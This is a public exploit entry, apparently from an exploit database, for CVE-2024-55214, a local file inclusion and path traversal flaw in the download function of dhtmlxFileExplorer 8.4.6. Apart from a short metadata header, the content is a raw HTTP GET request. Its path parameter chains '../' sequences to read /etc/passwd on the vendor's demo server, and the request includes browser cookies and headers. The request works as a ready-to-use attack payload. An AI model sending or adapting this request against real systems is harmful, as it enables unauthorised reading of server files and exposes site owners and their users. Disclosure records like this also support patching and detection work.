Exploit for dhtmlxFileExplorer 8.4.6 Local File Inclusion / Traversal CVE-2024-55214

## https://sploitus.com/exploit?id=PACKETSTORM:189018
# Exploit Title: dhtmlxFileExplorer 8.4.6 - Local File Inclusion in the Download Function of File Explorer
    # Date: Feb 6, 2025
    # Exploit Author: Nutchaya Augkanavitayakul, Nattachai Wanmak, Pongtorn Angsuchotmetee 
    # Vendor Homepage: https://dhtmlx.com
    # Software Link: https://dhtmlx.com
    # Version: 8.4.6
    # Tested on: macOS
    # CVE : CVE-2024-55214
    
    GET /docs/products/demoApps/dhtmlxFileExplorerDemo/backend/download?path=/root_ui346174140464/My%20files/../../../../../../../../etc/passwd HTTP/1.1
    Host: dhtmlx.com
    Cookie: _gcl_au=1.1.1418928943.1730870702; _gid=GA1.2.1885390698.1730870702; _ym_uid=1730870703147102827; _ym_d=1730870703; _ym_isad=2; _ym_visorc=w; _ga_N87XPB4GSG=GS1.1.1730870702.1.1.1730871454.44.0.0; _ga=GA1.2.1785201866.1730870702
    Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "macOS"
    Accept-Language: en-US,en;q=0.9
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: https://dhtmlx.com/docs/products/demoApps/dhtmlxFileExplorerDemo/
    Accept-Encoding: gzip, deflate, br
    Priority: u=0, i
    Connection: keep-alive